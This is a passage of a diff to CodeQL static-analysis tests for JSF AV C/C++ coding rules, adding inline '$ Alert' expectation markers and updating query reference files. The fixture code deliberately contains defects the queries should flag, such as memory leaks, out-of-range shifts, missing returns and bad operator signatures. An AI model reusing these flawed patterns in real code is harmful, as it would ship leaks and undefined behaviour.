79/AV Rule 79.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.qlref index 34b54bccd467..23a70aede929 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 79.ql +query: jsf/4.10 Classes/AV Rule 79.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Container2.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Container2.cpp index 6961a8d35526..84216aa838cb 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Container2.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Container2.cpp @@ -18,7 +18,7 @@ class Container2 void Alloc() { ptr2 = new T(); // GOOD - ptr3 = new T(); // BAD: not deleted in destructor + ptr3 = new T(); // BAD: not deleted in destructor // $ Alert } void Free() diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/DeleteThis.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/DeleteThis.cpp index fc7ad7de26d3..3e4456daf9bf 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/DeleteThis.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/DeleteThis.cpp @@ -53,11 +53,11 @@ class MyClass3 ptr3 = new MyClass2(); // GOOD ptr4 = new MyClass2(); // GOOD ptr5 = new MyClass2(); // GOOD - ptr10 = new MyClass2(); // BAD: not deleted in destructor + ptr10 = new MyClass2(); // BAD: not deleted in destructor // $ Alert ptr11 = new MyClass2(); // GOOD - ptr12 = new MyClass2(); // BAD: not deleted in destructor + ptr12 = new MyClass2(); // BAD: not deleted in destructor // $ Alert ptr13 = new MyClass2(); // GOOD - ptr14 = new MyClass2(); // BAD: not deleted in destructor + ptr14 = new MyClass2(); // BAD: not deleted in destructor // $ Alert ptr15 = new MyClass2(); // GOOD ptr20 = new MyClass2(); // GOOD } @@ -124,7 +124,7 @@ class MyClass9 b = new MyClass5(); // GOOD c = new MyClass6(); // GOOD - d = new MyClass7(); // BAD + d = new MyClass7(); // BAD // $ Alert e = new MyClass7(); // BAD [NOT DETECTED] f = new MyClass8(); // BAD [NOT DETECTED] } diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ExternalOwners.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ExternalOwners.cpp index bdec96f30df4..89d298c299d4 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ExternalOwners.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ExternalOwners.cpp @@ -46,7 +46,7 @@ class MyScreen public: MyScreen() { - a = new MyWidget(); // BAD (not deleted) + a = new MyWidget(); // BAD (not deleted) // $ Alert b = new MyWidget(); // GOOD (deleted in widgets destructor) widgets.add(b); diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Lambda.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Lambda.cpp index 1b3233c52718..c0b70ee2c172 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Lambda.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Lambda.cpp @@ -21,7 +21,7 @@ class testLambda }; deleter3(); - r4 = new char[4096]; // BAD + r4 = new char[4096]; // BAD // $ Alert r5 = new char[4096]; // GOOD deleter5 = &deleter_for_r5; diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ListDelete.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ListDelete.cpp index bbea9da6f430..ad74ea69e26e 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ListDelete.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ListDelete.cpp @@ -18,7 +18,7 @@ class MyThingColection { public: MyThingColection() { - first = new MyThing; // GOOD (all deleted in destructor) [FALSE POSITIVE] + first = new MyThing; // GOOD (all deleted in destructor) [FALSE POSITIVE] // $ Alert first->next = new MyThing; // GOOD (all deleted in destructor) diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/NoDestructor.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/NoDestructor.cpp index f5d2b02efaa8..03dfbc62b45a 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/NoDestructor.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/NoDestructor.cpp @@ -20,7 +20,7 @@ class MyClass5 public: MyClass5() { - n = new MyNumber(); // BAD: not deleted + n = new MyNumber(); // BAD: not deleted // $ Alert } private: diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/PlacementNew.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/PlacementNew.cpp index c7794857cb94..68ec8e199520 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/PlacementNew.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/PlacementNew.cpp @@ -33,7 +33,7 @@ class MyTestForPlacementNew { void *buffer_ptr = buffer; - p1 = new MyClassForPlacementNew(1); // BAD: not released + p1 = new MyClassForPlacementNew(1); // BAD: not released // $ Alert p2 = new (std::nothrow) MyClassForPlacementNew(2); // BAD: not released [NOT DETECTED] p3 = new (buffer_ptr) MyClassForPlacementNew(3); // GOOD: placement new, not an allocation } diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/SelfRegistering.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/SelfRegistering.cpp index 75ad7f4d1fa0..013eb6398e71 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/SelfRegistering.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/SelfRegistering.cpp @@ -22,7 +22,7 @@ class MyOwner bottom = new MyElement(); // GOOD bottom->bind(this); - side = new MyElement(); // BAD (never released) + side = new MyElement(); // BAD (never released) // $ Alert side->donothing(123); } diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Variants.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Variants.cpp index 7727a038248d..0017230d3d0e 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Variants.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Variants.cpp @@ -23,7 +23,7 @@ class MyClass4 c = d = new int; // GOOD (d is deleted) e = local = new int; // BAD (e is not deleted) [NOT REPORTED] - f = new int; // GOOD (ID(f) is deleted) [FALSE POSITIVE] + f = new int; // GOOD (ID(f) is deleted) [FALSE POSITIVE] // $ Alert g = ID(new int); // GOOD (g is deleted) } @@ -66,10 +66,10 @@ class MyClass6 public: MyClass6() { - a = new int[10]; // BAD - b = (int *)calloc(10, sizeof(int)); // BAD - c = (int *)realloc(0, 10 * sizeof(int)); // BAD - d = strdup("string"); // BAD + a = new int[10]; // BAD // $ Alert + b = (int *)calloc(10, sizeof(int)); // BAD // $ Alert + c = (int *)realloc(0, 10 * sizeof(int)); // BAD // $ Alert + d = strdup("string"); // BAD // $ Alert } ~MyClass6() diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Wrapped.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Wrapped.cpp index 6b0eb79f41cb..a2c5fb8a991c 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Wrapped.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Wrapped.cpp @@ -43,7 +43,7 @@ class Wrapped2 public: Wrapped2(int len) { ptr1 = new char[len]; // GOOD - ptr2 = new char[len]; // BAD: not released in destructor + ptr2 = new char[len]; // BAD: not released in destructor // $ Alert Init(len); } @@ -56,7 +56,7 @@ class Wrapped2 void Init(int len) { ptr3 = new char[len]; // GOOD - ptr4 = new char[len]; // BAD: not released in destructor + ptr4 = new char[len]; // BAD: not released in destructor // $ Alert } void Shutdown() diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.cpp index 411902ac32d2..c2136dcf2876 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.cpp @@ -15,13 +15,13 @@ class Container { }; struct Bad1 { - Bad1& operator=(const Bad1& other) { + Bad1& operator=(const Bad1& other) { // $ Alert return const_cast(other); // BAD (does not return a reference to *this) } }; struct Bad2 { - Bad2 operator=(const Bad2& other) { + Bad2 operator=(const Bad2& other) { // $ Alert return *this; // BAD (return type is not a reference) } }; @@ -60,7 +60,7 @@ class TemplateReturnAssignment { return *this = TemplateReturnAssignment(_val); // GOOD (calls above `operator=`) } - TemplateReturnAssignment &operator=(bool b) { + TemplateReturnAssignment &operator=(bool b) { // $ Alert return *(new TemplateReturnAssignment(0)); // BAD (does not return a reference to *this) } @@ -196,7 +196,7 @@ struct TemplatedAssignmentGood { struct TemplatedAssignmentBad { template - typename second::type operator=(T val) { // BAD (missing &) + typename second::type operator=(T val) { // BAD (missing &) // $ Alert return *this; } }; diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.qlref index 3e47acb20c8e..260d6a99c420 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 82.ql +query: jsf/4.10 Classes/AV Rule 82.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.cpp index 292b8857cb97..18b56dd0d0b8 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.cpp @@ -1,12 +1,12 @@ -class MyClass1 { +class MyClass1 { // $ Alert public: int i; bool operator< (const MyClass1 &rhs){ return i < rhs.i; } // BAD: operator>= missing }; -class MyClass2 { +class MyClass2 { // $ Alert public: int i; bool operator< (const MyClass2 &rhs){ return i < rhs.i; } @@ -22,7 +22,7 @@ class MyClass3 { // GOOD }; -class MyClass4 { +class MyClass4 { // $ Alert public: int i; bool operator< (const MyClass4 &rhs){ return i < rhs.i; } @@ -76,7 +76,7 @@ class MyClass7 { MyClass7 myClass7; template -class MyClass8 { +class MyClass8 { // $ Alert public: int i; template @@ -100,7 +100,7 @@ void f8(void) { } template -class MyClass9 { +class MyClass9 { // $ Alert public: int i; template diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.qlref index 2608ffff47cb..72f5094881b6 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 85.ql +query: jsf/4.10 Classes/AV Rule 85.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/AV Rule 97.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/AV Rule 97.qlref index c08b4c966198..953d90e70be7 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/AV Rule 97.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/AV Rule 97.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 97.ql \ No newline at end of file +query: jsf/4.10 Classes/AV Rule 97.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/jsf97.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/jsf97.cpp index df00f154480a..8e8b7ab6ba7e 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/jsf97.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/jsf97.cpp @@ -3,22 +3,22 @@ typedef int jmp_buf[16]; class C { public: -static int bad1(char xs[10]) +static int bad1(char xs[10]) // $ Alert { return sizeof(xs); } -static int bad2(char xs[]) +static int bad2(char xs[]) // $ Alert { return sizeof(xs); } -static int bad3(chars xs) +static int bad3(chars xs) // $ Alert { return sizeof(xs); } -static int bad4(chars const xs) +static int bad4(chars const xs) // $ Alert { return sizeof(xs); } @@ -37,7 +37,7 @@ static void good_longjmp(jmp_buf j) { } -static void bad_longjmp(int j[16]) +static void bad_longjmp(int j[16]) // $ Alert { } diff --git a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/AV Rule 107.qlref b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/AV Rule 107.qlref index 57f35c3bcf2d..e24890cc9a86 100644 --- a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/AV Rule 107.qlref +++ b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/AV Rule 107.qlref @@ -1 +1,2 @@ -jsf/4.13 Functions/AV Rule 107.ql +query: jsf/4.13 Functions/AV Rule 107.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/test.c b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/test.c index 975d9e196daa..d0fc93965098 100644 --- a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/test.c +++ b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/test.c @@ -8,14 +8,14 @@ void test1() { - void inner1(); // BAD - extern int inner2(); // BAD + void inner1(); // BAD // $ Alert + extern int inner2(); // BAD // $ Alert void inner3() {}; // GOOD (this isn't a declaration, it's a GCC nested function) MY_FUNCTION_1(); // GOOD (in a macro) MY_FUNCTION_2(); // GOOD (in a macro) - MYTYPE inner4(); // BAD (function declaration is not in the macro) - void inner5(MYTYPE p); // BAD (function declaration is not in the macro) + MYTYPE inner4(); // BAD (function declaration is not in the macro) // $ Alert + void inner5(MYTYPE p); // BAD (function declaration is not in the macro) // $ Alert } #define STATICASSERT(cond) void staticAssert(int arg[(cond) ? (1) : (-1)]) diff --git a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/AV Rule 114.qlref b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/AV Rule 114.qlref index fbffe346bcfc..16716eca98f9 100644 --- a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/AV Rule 114.qlref +++ b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/AV Rule 114.qlref @@ -1 +1,2 @@ -jsf/4.13 Functions/AV Rule 114.ql +query: jsf/4.13 Functions/AV Rule 114.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/complex.c b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/complex.c index fc190eb518cd..767eb4284440 100644 --- a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/complex.c +++ b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/complex.c @@ -1,10 +1,10 @@ _Complex double complexTest1(float a, float b) { - _Complex double x = __builtin_complex(a, b); // BAD + _Complex double x = __builtin_complex(a, b); // BAD // $ Alert } _Complex double complexTest2(float a, float b) { - auto x = __builtin_complex(a, b) * 2.0f; // BAD + auto x = __builtin_complex(a, b) * 2.0f; // BAD // $ Alert } _Complex double complexTest3(float a, float b) { diff --git a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.c b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.c index f0b2dff13308..021e9e5d2d7b 100644 --- a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.c +++ b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.c @@ -5,7 +5,7 @@ int f1(void) { } int f2(void) { - int x = 1; + int x = 1; // $ Alert } // BAD int f3(int b) { @@ -22,7 +22,7 @@ int f3(int b) { int f4(int b) { int x; if (b) { - x = 1; + x = 1; // $ Alert } else { x = 3; return 4; @@ -36,7 +36,7 @@ int f5(void) { int f6(int b) { int x; if (b) { - x = 1; + x = 1; // $ Alert } else { __builtin_unreachable(); } diff --git a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.cpp b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.cpp index 0c7e02ce9ac0..d31506df0167 100644 --- a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.cpp +++ b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.cpp @@ -15,7 +15,7 @@ MyValue g1() MyValue g2() { // BAD -} +} // $ Alert MyValue g3() { @@ -49,7 +49,7 @@ MyValue g7(bool c) DONOTHING DONOTHING // BAD -} +} // $ Alert typedef void MYVOID; MYVOID g8() @@ -73,7 +73,7 @@ TypePair::first g9() TypePair::second g10() { // BAD (the return type amounts to int) -} +} // $ Alert template typename TypePair::first g11() @@ -85,7 +85,7 @@ template typename TypePair::second g12() { // BAD (the return type amounts to T / int) -} +} // $ Alert void instantiate() { @@ -109,7 +109,7 @@ int g14(int x) { myThrow("fail"); // BAD (doesn't always throw) } -} +} // $ Alert int g15(int x) { @@ -131,14 +131,14 @@ void myConditionalThrow(bool condition, const char *error) int g16(int x) { - myConditionalThrow(x < 10, "fail"); // BAD (doesn't always throw) + myConditionalThrow(x < 10, "fail"); // BAD (doesn't always throw) // $ Alert } int g17(int x) { try { - myConditionalThrow(x < 10, "fail"); + myConditionalThrow(x < 10, "fail"); // $ Alert } catch (...) { return x; // BAD (doesn't always reach this return) } @@ -186,7 +186,7 @@ int g22() { } int g23() { - Aborting().a(); // GOOD [FALSE POSITIVE] + Aborting().a(); // GOOD [FALSE POSITIVE] // $ Alert } [[__noreturn__]] diff --git a/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/AV Rule 145.qlref b/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/AV Rule 145.qlref index 27a18956b402..6bc33e6e8de0 100644 --- a/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/AV Rule 145.qlref +++ b/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/AV Rule 145.qlref @@ -1 +1,2 @@ -jsf/4.16 Initialization/AV Rule 145.ql +query: jsf/4.16 Initialization/AV Rule 145.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/test.c b/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/test.c index cd7b56779096..11a8f3593290 100644 --- a/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/test.c +++ b/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/test.c @@ -5,7 +5,7 @@ enum { E1C }; -enum { +enum { // $ Alert E2A = 1, E2B, E2C, @@ -13,7 +13,7 @@ enum { E2E }; -enum { +enum { // $ Alert E3A = 1, E3B = 2, E3C = 10, @@ -35,7 +35,7 @@ enum { E5C }; -enum { +enum { // $ Alert E6A, E6B, E6C = 10, diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/AV Rule 157.qlref b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/AV Rule 157.qlref index be23cb77df59..4a9a7d359f80 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/AV Rule 157.qlref +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/AV Rule 157.qlref @@ -1 +1,2 @@ -jsf/4.21 Operators/AV Rule 157.ql +query: jsf/4.21 Operators/AV Rule 157.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/test.c b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/test.c index 69656806dd94..594ffff2eea3 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/test.c +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/test.c @@ -17,19 +17,19 @@ void f(int x, int y) { if (x && y) x++; - if (x && y++) + if (x && y++) // $ Alert x++; if (x && pureFun()) x++; - if (x && imPureFun()) + if (x && imPureFun()) // $ Alert x++; if (x && strcmp("foo", "bar")) x++; - if (x && unknownFun("foo", "bar")) + if (x && unknownFun("foo", "bar")) // $ Alert x++; } diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/AV Rule 164.qlref b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/AV Rule 164.qlref index d6afaadc5957..637a63fa173b 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/AV Rule 164.qlref +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/AV Rule 164.qlref @@ -1 +1,2 @@ -jsf/4.21 Operators/AV Rule 164.ql +query: jsf/4.21 Operators/AV Rule 164.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/test.c b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/test.c index 99cc6bd7db7d..d6f2ceb6148a 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/test.c +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/test.c @@ -1,28 +1,28 @@ void f(unsigned char uc, signed char sc, int i) { - uc >> -1; // BAD + uc >> -1; // BAD // $ Alert uc >> 0; uc >> 7; - uc >> 8; // BAD + uc >> 8; // BAD // $ Alert - uc << -1; // BAD + uc << -1; // BAD // $ Alert uc << 0; uc << 7; - uc << 8; // BAD + uc << 8; // BAD // $ Alert uc >>= -1; // BAD [NOT DETECTED] uc >>= 0; // BAD [NOT DETECTED] uc >>= 7; uc >>= 8; // BAD [NOT DETECTED] - sc >> -1; // BAD + sc >> -1; // BAD // $ Alert sc >> 0; sc >> 7; - sc >> 8; // BAD + sc >> 8; // BAD // $ Alert - ((unsigned char)i) >> -1; // BAD + ((unsigned char)i) >> -1; // BAD // $ Alert ((unsigned char)i) >> 0; ((unsigned char)i) >> 7; - ((unsigned char)i) >> 8; // BAD + ((unsigned char)i) >> 8; // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/AV Rule 165.qlref b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/AV Rule 165.qlref index a6ee879dfe95..d80a910b428d 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/AV Rule 165.qlref +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/AV Rule 165.qlref @@ -1 +1,2 @@ -jsf/4.21 Operators/AV Rule 165.ql +query: jsf/4.21 Operators/AV Rule 165.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/test.c b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/test.c index 26d53e5a0c35..dc5248ee7c32 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/test.c +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/test.c @@ -3,25 +3,25 @@ typedef unsigned int TUI; void f(int i, unsigned int ui, signed int si, TUI tui, volatile unsigned int vui, unsigned u, unsigned short us) { i = -i; - i = -ui; // BAD + i = -ui; // BAD // $ Alert i = -si; ui = -i; - ui = -ui; // BAD + ui = -ui; // BAD // $ Alert ui = -si; si = -i; - si = -ui; // BAD + si = -ui; // BAD // $ Alert si = -si; i = -(int)i; - i = -(unsigned int)i; // BAD + i = -(unsigned int)i; // BAD // $ Alert i = -(signed int)i; ui = -(int)ui; - ui = -(unsigned int)ui; // BAD + ui = -(unsigned int)ui; // BAD // $ Alert ui = -(signed int)ui; - tui = -tui; // BAD - vui = -vui; // BAD - u = -u; // BAD - us = -us; // BAD + tui = -tui; // BAD // $ Alert + vui = -vui; // BAD // $ Alert + u = -u; // BAD // $ Alert + us = -us; // BAD // $ Alert ui = -(5U); // BAD [NOT DETECTED] } diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/AV Rule 166.qlref b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/AV Rule 166.qlref index 956118bf8c59..bccd03161582 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/AV Rule 166.qlref +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/AV Rule 166.qlref @@ -1 +1,2 @@ -jsf/4.21 Operators/AV Rule 166.ql +query: jsf/4.21 Operators/AV Rule 166.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/test.c b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/test.c index e272214215d5..5af0c3c70526 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/test.c +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/test.c @@ -19,8 +19,8 @@ void f(void) { sizeof(vi); sizeof(*ip); sizeof(*vip); - sizeof(global++); + sizeof(global++); // $ Alert sizeof(pure()); - sizeof(impure()); + sizeof(impure()); // $ Alert } diff --git a/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.cpp b/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.cpp index 36c5d9a84fad..e263b8f89a09 100644 --- a/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.cpp +++ b/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.cpp @@ -15,31 +15,31 @@ operator_t good_get_operator(bool which) return which ? add : sub; } -int (*bad_get_operator(bool which))(int, int) +int (*bad_get_operator(bool which))(int, int) // $ Alert { return which ? add : sub; } typedef operator_t (*good_meta_t)(bool); -typedef int (*(*bad_meta_t)(bool))(int, int); +typedef int (*(*bad_meta_t)(bool))(int, int); // $ Alert int good_call(operator_t op, int lhs, int rhs) { return op(lhs, rhs); } -int bad_call(int(*op)(int, int), int lhs, int rhs) +int bad_call(int(*op)(int, int), int lhs, int rhs) // $ Alert { return op(lhs, rhs); } typedef int (*good_call_t)(operator_t, int, int); -typedef int (*bad_call_t)(int(*)(int, int), int, int); +typedef int (*bad_call_t)(int(*)(int, int), int, int); // $ Alert void usages() { operator_t good_op = add; - int (*bad_op)(int, int) = good_op; + int (*bad_op)(int, int) = good_op; // $ Alert good_meta_t good_meta_1 = good_get_operator; bad_meta_t good_meta_2 = good_meta_1; diff --git a/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.qlref b/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.qlref index b4218cca8350..18ed00a74cf6 100644 --- a/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.qlref +++ b/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.qlref @@ -1 +1,2 @@ -jsf/4.22 Pointers and References/AV Rule 176.ql +query: jsf/4.22 Pointers and References/AV Rule 176.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/AV Rule 186.qlref b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/AV Rule 186.qlref index f6fb0bccea00..a811ca432d09 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/AV Rule 186.qlref +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/AV Rule 186.qlref @@ -1 +1,2 @@ -jsf/4.24 Control Flow Structures/AV Rule 186.ql +query: jsf/4.24 Control Flow Structures/AV Rule 186.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/test.c b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/test.c index 5dc0c0e94172..b40616d2ecf7 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV 